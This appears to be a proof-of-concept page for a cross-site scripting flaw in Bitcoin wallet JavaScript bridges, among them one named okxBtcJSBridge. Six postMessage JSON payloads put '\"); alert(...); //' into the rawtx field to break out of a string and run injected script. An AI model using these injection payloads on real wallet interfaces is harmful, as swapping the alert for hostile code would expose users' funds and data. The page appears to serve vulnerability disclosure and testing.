🎯 Attack Vector: bundle.data XSS
This PoC exploits the XSS vulnerability where user-controlled data from the rawtx field
in postMessage gets stored in bundle.data and directly concatenated into JavaScript
without sanitization in multiple Bitcoin protocol handlers.
window.bitcoin (Main Bitcoin Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via window.bitcoin.signPsbt!'); //"
}
}
Test signPsbt XSS
🔸 signPsbts Method (XSS via bundle.data)
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via window.bitcoin.signPsbts!'); //"
}
}
Test signPsbts XSS
🔸 Default Case (XSS via bundle.data)
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via window.bitcoin.default!'); //"
}
}
Test Default XSS
window.bitcoinTestnet (Testnet Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via window.bitcoinTestnet.signPsbt!'); //"
}
}
Test Testnet signPsbt XSS
window.bitcoinSignet (Signet Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via window.bitcoinSignet.signPsbt!'); //"
}
}
Test Signet signPsbt XSS
window.okxBtcJSBridge (Fractal Bitcoin Interface)
🔸 signPsbt Method (XSS via bundle.data)
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via window.okxBtcJSBridge.signPsbt!'); //"
}
}
Test Fractal signPsbt XSS